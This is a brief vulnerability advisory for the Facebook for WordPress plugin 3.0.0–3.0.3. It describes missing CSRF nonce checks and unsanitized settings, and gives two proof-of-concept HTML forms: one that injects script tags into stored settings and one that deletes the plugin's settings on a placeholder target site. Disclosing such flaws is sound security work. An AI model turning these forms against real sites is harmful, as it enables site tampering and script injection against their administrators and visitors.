Facebook for WordPress 3.0.0-3.0.3 - CSRF to Stored XSS and Settings Deletion

2021-03-2500:00:00

Chloe Chamberland

105

JSON

The wp_ajax_save_fbe_settings and wp_ajax_delete_fbe_settings AJAX actions of the plugin were vulnerable to CSRF due to a lack of nonce protection. The settings in the saveFbeSettings function had no sanitization allowing for script tags to be saved.

CSRF to XSS
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="save_fbe_settings" />
      <input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
      <input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
      <input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF to Delete settings
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="delete_fbe_settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>